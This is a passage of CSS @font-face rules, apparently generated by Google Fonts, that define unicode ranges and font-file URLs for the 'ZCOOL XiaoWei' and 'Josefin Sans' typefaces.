U+538b, U+53e6, U+5426, U+542b, U+542f, U+5462, U+5473, U+554a, U+5566, U+5708, U+571f, U+5757, U+57df, U+57f9, U+5802, U+590f, U+591c, U+591f, U+592b, U+5965, U+5979, U+5a01, U+5a5a, U+5b63, U+5b69, U+5b81, U+5ba1, U+5ba3, U+5c3c, U+5c42, U+5c81, U+5de7, U+5dee, U+5e0c, U+5e10, U+5e55, U+5e86, U+5e8f, U+5ea7, U+5f02, U+5f52, U+5f81, U+5ff5, U+60ca, U+60e0, U+6279, U+62c5, U+62ff, U+63cf, U+6444, U+64cd, U+653b, U+65bd, U+65e9, U+665a, U+66b4, U+66fe, U+6728, U+6742, U+677e, U+67b6, U+680f, U+68a6, U+68c0, U+699c, U+6b4c, U+6b66, U+6b7b, U+6bcd, U+6bdb, U+6c38, U+6c47, U+6c49, U+6cb3, U+6cb9, U+6ce2, U+6d32, U+6d3e, U+6d4f, U+6e56, U+6fc0, U+7075, U+7206, U+725b, U+72c2, U+73ed, U+7565, U+7591, U+7597, U+75c5, U+76ae, U+76d1, U+76df, U+7834, U+7968, U+7981, U+79c0, U+7a7f, U+7a81, U+7ae5, U+7b14, U+7c89, U+7d27, U+7eaf, U+7eb3, U+7eb8, U+7ec7, U+7ee7, U+7eff, U+7f57, U+7ffb, U+805a, U+80a1, U+822c, U+82cf, U+82e5, U+8363, U+836f, U+84dd, U+878d, U+8840, U+8857, U+8863, U+8865, U+8b66, U+8bb2, U+8bda, U+8c01, U+8c08, U+8c46, U+8d1f, U+8d35, U+8d5b, U+8d5e, U+8da3, U+8ddf, U+8f93, U+8fdd, U+8ff0, U+8ff7, U+8ffd, U+9000, U+9047, U+9152, U+949f, U+94c1, U+94f6, U+9646, U+9648, U+9669, U+969c, U+96ea, U+97e9, U+987b, U+987e, U+989d, U+9970, U+9986, U+9c7c, U+9c9c;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.115.woff2) format(\'woff2\');unicode-range: U+25, U+4e14, U+4e1d, U+4e3d, U+4e49, U+4e60, U+4e9a, U+4eb2, U+4ec5, U+4efd, U+4f3c, U+4f4f, U+4f8b, U+4fbf, U+5019, U+5145, U+514b, U+516b, U+516d, U+5174, U+5178, U+517b, U+5199, U+519b, U+51b3, U+51b5, U+5207, U+5212, U+5219, U+521d, U+52bf, U+533b, U+5343, U+5347, U+534a, U+536b, U+5370, U+53e4, U+53f2, U+5403, U+542c, U+547d, U+54a8, U+54cd, U+54ea, U+552e, U+56f4, U+5747, U+575b, U+5883, U+589e, U+5931, U+5947, U+5956-5957, U+5a92, U+5b83, U+5ba4, U+5bb3, U+5bcc, U+5c14, U+5c1a, U+5c3d, U+5c40, U+5c45, U+5c5e, U+5df4, U+5e72, U+5e95, U+5f80, U+5f85, U+5fb7, U+5fd7, U+601d, U+626b, U+627f, U+62c9, U+62cd, U+6309, U+63a7, U+6545, U+65ad, U+65af, U+65c5, U+666e, U+667a, U+670b, U+671b, U+674e, U+677f, U+6781, U+6790, U+6797, U+6821, U+6838-6839, U+697c, U+6b27, U+6b62, U+6bb5, U+6c7d, U+6c99, U+6d4b, U+6d4e, U+6d6a, U+6e29, U+6e2f, U+6ee1, U+6f14, U+6f2b, U+72b6, U+72ec, U+7387, U+7533, U+753b, U+76ca, U+76d8, U+7701, U+773c, U+77ed, U+77f3, U+7814, U+793c, U+79bb, U+79c1, U+79d8, U+79ef, U+79fb, U+7a76, U+7b11, U+7b54, U+7b56, U+7b97, U+7bc7, U+7c73, U+7d20, U+7eaa, U+7ec8, U+7edd, U+7eed, U+7efc, U+7fa4, U+804c, U+8058, U+80cc, U+8111, U+817e, U+826f, U+8303, U+843d, U+89c9, U+89d2, U+8ba2, U+8bbf, U+8bc9, U+8bcd, U+8be6, U+8c22, U+8c61, U+8d22, U+8d26-8d27, U+8d8a, U+8f6f, U+8f7b, U+8f83, U+8f91, U+8fb9, U+8fd4, U+8fdc, U+9002, U+94b1, U+9519, U+95ed, U+961f, U+9632-9633, U+963f, U+968f-9690, U+96be, U+9876, U+9884, U+98de, U+9988, U+9999, U+9ec4, U+ff1b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.116.woff2) format(\'woff2\');unicode-range: U+2b, U+40, U+3000, U+300a-300b, U+4e16, U+4e66, U+4e70, U+4e91-4e92, U+4e94, U+4e9b, U+4ec0, U+4eca, U+4f01, U+4f17-4f18, U+4f46, U+4f4e, U+4f9b, U+4fee, U+503c, U+5065, U+50cf, U+513f, U+5148, U+518d, U+51c6, U+51e0, U+5217, U+529e-529f, U+5341, U+534f, U+5361, U+5386, U+53c2, U+53c8, U+53cc, U+53d7-53d8, U+53ea, U+5404, U+5411, U+5417, U+5427, U+5468, U+559c, U+5668, U+56e0, U+56e2, U+56ed, U+5740, U+57fa, U+58eb, U+5904, U+592a, U+59cb, U+5a31, U+5b58, U+5b9d, U+5bc6, U+5c71, U+5dde, U+5df1, U+5e08, U+5e26, U+5e2e, U+5e93, U+5e97, U+5eb7, U+5f15, U+5f20, U+5f3a, U+5f62, U+5f69, U+5f88, U+5f8b, U+5fc5, U+600e, U+620f, U+6218, U+623f, U+627e, U+628a, U+62a4, U+62db, U+62e9, U+6307, U+6362, U+636e, U+64ad, U+6539, U+653f, U+6548, U+6574, U+6613, U+6625, U+663e, U+666f, U+672a, U+6750, U+6784, U+6a21, U+6b3e, U+6b65, U+6bcf, U+6c11, U+6c5f, U+6df1, U+706b, U+7167, U+724c, U+738b, U+73a9, U+73af, U+7403, U+7537, U+754c, U+7559, U+767d, U+7740, U+786e, U+795e, U+798f, U+79f0, U+7aef, U+7b7e, U+7bb1, U+7ea2, U+7ea6, U+7ec4, U+7ec6, U+7ecd, U+7edc, U+7ef4, U+8003, U+80b2, U+81f3-81f4, U+822a, U+827a, U+82f1, U+83b7, U+8425, U+89c2, U+89c8, U+8ba9, U+8bb8, U+8bc6, U+8bd5, U+8be2, U+8be5, U+8bed, U+8c03, U+8d23, U+8d2d, U+8d34, U+8d70, U+8db3, U+8fbe, U+8fce, U+8fd1, U+8fde, U+9001, U+901f-9020, U+90a3, U+914d, U+91c7, U+94fe, U+9500, U+952e, U+9605, U+9645, U+9662, U+9664, U+9700, U+9752, U+975e, U+97f3, U+9879, U+9886, U+98df, U+9a6c, U+9a8c, U+9ed1, U+9f99;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.117.woff2) format(\'woff2\');unicode-range: U+4e, U+201c-201d, U+3010-3011, U+4e07, U+4e1c, U+4e24, U+4e3e, U+4e48, U+4e50, U+4e5f, U+4e8b-4e8c, U+4ea4, U+4eab-4eac, U+4ecb, U+4ece, U+4ed6, U+4ee3, U+4ef6-4ef7, U+4efb, U+4f20, U+4f55, U+4f7f, U+4fdd, U+505a, U+5143, U+5149, U+514d, U+5171, U+5177, U+518c, U+51fb, U+521b, U+5229, U+522b, U+52a9, U+5305, U+5317, U+534e, U+5355, U+5357, U+535a, U+5373, U+539f, U+53bb, U+53ca, U+53cd, U+53d6, U+53e3, U+53f0, U+5458, U+5546, U+56db, U+573a, U+578b, U+57ce, U+58f0, U+590d, U+5934, U+5973, U+5b57, U+5b8c, U+5b98, U+5bb9, U+5bfc, U+5c06, U+5c11, U+5c31, U+5c55, U+5df2, U+5e03, U+5e38, U+5e76, U+5e94, U+5efa, U+5f71, U+5f97, U+5feb, U+6001, U+603b, U+60f3, U+611f, U+6216, U+624d, U+6253, U+6295, U+6301, U+6392, U+641c, U+652f, U+653e, U+6559, U+6599, U+661f, U+671f, U+672f, U+6761, U+67e5, U+6807, U+6837, U+683c, U+6848, U+6b22, U+6b64, U+6bd4, U+6c14, U+6c34, U+6c42, U+6ca1, U+6d41, U+6d77, U+6d88, U+6e05, U+6e38, U+6e90, U+7136, U+7231, U+7531, U+767e, U+76ee, U+76f4, U+771f, U+7801, U+793a, U+79cd, U+7a0b, U+7a7a, U+7acb, U+7ae0, U+7b2c, U+7b80, U+7ba1, U+7cbe, U+7d22, U+7ea7, U+7ed3, U+7ed9, U+7edf, U+7f16, U+7f6e, U+8001, U+800c, U+8272, U+8282, U+82b1, U+8350, U+88ab, U+88c5, U+897f, U+89c1, U+89c4, U+89e3, U+8a00, U+8ba1, U+8ba4, U+8bae-8bb0, U+8bbe, U+8bc1, U+8bc4, U+8bfb, U+8d28, U+8d39, U+8d77, U+8d85, U+8def, U+8eab, U+8f66, U+8f6c, U+8f7d, U+8fd0, U+9009, U+90ae, U+90fd, U+91cc-91cd, U+91cf, U+95fb, U+9650, U+96c6, U+9891, U+98ce, U+ff1f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.118.woff2) format(\'woff2\');unicode-range: U+d, U+3e, U+5f, U+7c, U+a0, U+a9, U+4e09-4e0b, U+4e0d-4e0e, U+4e13, U+4e1a, U+4e2a, U+4e3a-4e3b, U+4e4b, U+4e86, U+4e8e, U+4ea7, U+4eba, U+4ee4-4ee5, U+4eec, U+4f1a, U+4f4d, U+4f53, U+4f5c, U+4f60, U+4fe1, U+5165, U+5168, U+516c, U+5173, U+5176, U+5185, U+51fa, U+5206, U+5230, U+5236, U+524d, U+529b, U+52a0-52a1, U+52a8, U+5316, U+533a, U+53cb, U+53d1, U+53ef, U+53f7-53f8, U+5408, U+540c-540e, U+544a, U+548c, U+54c1, U+56de, U+56fd-56fe, U+5728, U+5730, U+5907, U+5916, U+591a, U+5927, U+5929, U+597d, U+5982, U+5b50, U+5b66, U+5b89, U+5b9a, U+5b9e, U+5ba2, U+5bb6, U+5bf9, U+5c0f, U+5de5, U+5e02, U+5e73-5e74, U+5e7f, U+5ea6, U+5f00, U+5f0f, U+5f53, U+5f55, U+5fae, U+5fc3, U+6027, U+606f, U+60a8, U+60c5, U+610f, U+6210-6211, U+6237, U+6240, U+624b, U+6280, U+62a5, U+63a5, U+63a8, U+63d0, U+6536, U+6570, U+6587, U+65b9, U+65e0, U+65f6, U+660e, U+662d, U+662f, U+66f4, U+6700, U+670d, U+672c, U+673a, U+6743, U+6765, U+679c, U+682a, U+6b21, U+6b63, U+6cbb, U+6cd5, U+6ce8, U+6d3b, U+70ed, U+7247-7248, U+7269, U+7279, U+73b0, U+7406, U+751f, U+7528, U+7535, U+767b, U+76f8, U+770b, U+77e5, U+793e, U+79d1, U+7ad9, U+7b49, U+7c7b, U+7cfb, U+7ebf, U+7ecf, U+7f8e, U+8005, U+8054, U+80fd, U+81ea, U+85cf, U+884c, U+8868, U+8981, U+89c6, U+8bba, U+8bdd, U+8bf4, U+8bf7, U+8d44, U+8fc7, U+8fd8-8fd9, U+8fdb, U+901a, U+9053, U+90e8, U+91d1, U+957f, U+95e8, U+95ee, U+95f4, U+9762, U+9875, U+9898, U+9996, U+9ad8, U+ff01, U+ff08-ff09;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.119.woff2) format(\'woff2\');unicode-range: U+20-22, U+27-2a, U+2c-3b, U+3f, U+41-4d, U+4f-5d, U+61-7b, U+7d, U+ab, U+ae, U+b2, U+b7, U+bb, U+df-e5, U+e7-ea, U+ec-ed, U+f1-f4, U+f6, U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, 